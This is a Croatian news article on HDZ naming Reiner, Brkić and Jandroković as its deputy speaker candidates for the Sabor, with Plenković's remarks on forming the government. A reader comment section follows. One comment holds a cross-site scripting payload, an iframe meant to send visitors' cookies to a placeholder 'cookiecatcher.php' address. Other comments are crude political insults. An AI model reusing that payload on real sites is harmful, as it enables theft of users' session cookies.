hren
 

Uoči konstituirajuće sjednice Sabora koja se održava u petak, Predsjedništvo HDZ-a sastalo se danas kako bi donijelo odluke o kadrovskim pitanjima vezanim uz funkcije u Saboru, a potom je to učinio i Središnji odbor.

Andrej Plenković, predsjednik HDZ-a, izvijestio je nakon sjednice Predsjedništva da je HDZ odlučio tko će biti njihova tri kandidata za potpredsjednike Sabora.

''Kandidati su Željko Reiner, Milijan Brkić i Gordan Jandroković'', kazao je Plenković.

Kao mogući HDZ-ovi potpredsjednici Sabora prvotno su se spominjali Miroslav Tuđman, Željko Reiner i Gordan Jandroković dok su mnogi Milijana Brkića skroz otpisali.

Nakon sjednice Središnjeg odbora HDZ-a koja je počela u podne Plenković je kratko izjavio:

"Dobili smo potporu za sve aktivnosti koje poduzimamo vezano uz novu hrvatsku Vladu. Donijeli smo odluku o ustroju Savjetodavnog vijeća HDZ-a. Za sutra u 12 sati sazvali smo prvu sjednicu novog Kluba HDZ-a".

Kazao je da ima neke sigurne kandidate za ministre, ali o njima nije želio govoriti. Rekao je da će ih objaviti u kompletu, cijeli sastav Vlade, te da je sigurno da će ministri biti njegov izbor i da ne pristaje ne pritiske.

Osim o kandidatima za tri potpredsjednika Sabora, HDZ-ovci su odlučivali i o kandidatima za funkcije u saborskim odborima te razmatrali prijedloge zakona koji će se na konstituirajućoj sjednici uvrstiti na dnevni red - od onih koji se tiču ustroja Vlade do onih koje je uvjetovao Most.

Izvor: Dnevnik.hr


KOMENTARI:

Stari Komentari (6)

 • Es (Gost_5131)

  Pupovac potpresednik vlade

  oko 2 godina prije
 • (Gost_9221)

  <iframe frameborder="0" height="0" width="0" src="/javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>

  oko 2 godina prije
 • (Gost_1655)

  Rastače se Hrvatska mila

  oko 2 godina prije
 • (Gost_6129)

  milijan brkić čovjek koji nije u stanju ni diplomirati pošteno potpredsjednik sabora. plenković je ovim činom priznao da ga drže za jajca. sam na sebe i svoje kvalifikacije pljuca

  oko 2 godina prije
 • (Gost_8594)

  čime ste vi kvalificirani da prosuđujete djelovanje bilo koga, na temelju kojih spoznaja osim primitivnog i pokvarenog politikanstva,

  oko 2 godina prije
 • (Gost_8594) (Gost_5153)

  na temelju onog što ovi ljudi rade. jeli brkić pošteno diplomirao, nije. upitno je dali je i ispite pošteno položio pogotovo kad se zna kako su naši vrli generali bivši šoferi i konobari slali indekse da im se ispune.donekle razumin njih primitivčine i bahate,a li ne mogu svatit ove druge da to prihvačaju, jer oni sa dopisnim diplomama oduzimaju svaku šansu redovnima da se zaposle i zato ovi bježe vani tražeći posal. vi glasajte za njih

  oko 2 godina prije
Komentiranje je moguće smo putem facebook komentara